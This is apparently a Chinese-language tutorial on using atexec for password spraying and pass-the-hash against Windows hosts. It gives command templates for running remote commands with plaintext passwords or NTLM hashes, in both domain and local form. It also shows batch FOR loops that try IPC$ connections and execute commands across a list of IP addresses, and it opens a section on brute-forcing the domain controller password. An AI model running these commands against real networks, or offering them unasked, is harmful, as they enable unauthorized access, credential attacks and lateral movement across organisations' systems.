使用atexec进行喷洒攻击
工具下载地址
注意事项
atexec最好需要指定administrator用户,经测试,普通用户以及普通管理用户无法直接执行命令。
atexec首次执行需要执行两次
如下图所示:
单个传递密码
域环境下需要指定域名,本地环境下使用点号代替
域环境下
1 | atexec.exe <domain>/<username>:<password>@<ip> "<command>" |
本地环境下
1 | atexec.exe ./<username>:<password>@<ip> "<command>" |
单个hash传递(ntlmhash)
域环境下
1 | atexec.exe -hashes :<hash> <domain>/<username>@<ip> "<command>" |
本地环境下
1 | atexec.exe -hashes :<hash> ./<username>@<ip> "<command>" |
批量传递密码
注意事项
如果写成批处理,那么%i需要变成%%i
(ips.txt)需要使用小括号包裹
DOS命令
dos命令除了变量以外不区分大小写,包括执行参数也不区分大小写。
批量尝试连接ipc$,连接成功后可以使用net use查看。
以下命令修改参数后可以直接执行,无需放在bat中
1 | for /f %i in (<ips.txt>) do net use \\%i\ipc$ "<password>" /user:<username> |
明文密码批量执行命令
1 | FOR /F %i in (<ips.txt>) do atexec.exe ./<username>:<passwd>@%i "<command>" |
hash批量执行命令
1 | FOR /F %i in (<ips.txt>) do atexec.exe -hashes :<hash> ./<username>@%i "<command>" |
爆破域控密码
指定密码或者hash去爆破指定机器
最好是爆破administrator用户
1 | # 使用指定密码集爆破 |